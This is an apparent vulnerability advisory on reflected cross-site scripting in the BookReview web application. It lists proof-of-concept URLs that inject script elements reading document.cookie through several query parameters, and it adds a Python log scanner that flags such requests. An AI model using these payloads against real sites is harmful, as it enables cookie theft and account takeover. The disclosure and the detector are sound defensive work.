BookReview Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:
http://www.example.com/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true
http://www.example.com/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true
http://www.example.com/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true
http://www.example.com/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>
http://www.example.com/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25
http://www.example.com/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author
http://www.example.com/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels
http://www.example.com/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>
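
For defenders reviewing web-server logs for requests of this shape, the following is an added example, not part of the original advisory or of BookReview itself. It decodes each query parameter and reports which ones carry a script element or an attribute breakout; the function names, the two patterns and the benign sample request are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The two injection shapes visible in the URIs above.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)  # element context
BREAKOUT = re.compile(r"[\"']\s*>")                      # attribute breakout

def normalise(value, max_rounds=3):
    """Percent-decode until stable (bounded), so repeated encoding is undone."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_request(target):
    """Return [(parameter, reason), ...] for one request target or full URL."""
    findings = []
    # parse_qsl performs the first round of decoding, parameter names included.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalise(raw)
        if SCRIPT_TAG.search(value):
            findings.append((name, "script-tag"))
        if BREAKOUT.search(value):
            findings.append((name, "attribute-breakout"))
    return findings

def summarise(targets):
    """Map each script path to the set of parameters that carried markup."""
    hits = {}
    for target in targets:
        for name, _reason in flag_request(target):
            hits.setdefault(urlsplit(target).path, set()).add(name)
    return hits

# Request targets as they would appear in an access log: the first three are
# taken from the URIs listed above, the last is a constructed benign request.
SAMPLE_TARGETS = [
    "/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true",
    "/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author",
    "/add_review.htm?isbn=0801052319&node=Political_Science&review=true",
]

if __name__ == "__main__":
    for path, params in sorted(summarise(SAMPLE_TARGETS).items()):
        print(path, sorted(params))
```

The parameters it reports are the ones whose values the application should HTML-encode before writing them into the page.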


 

Copyright 2010, SecurityFocus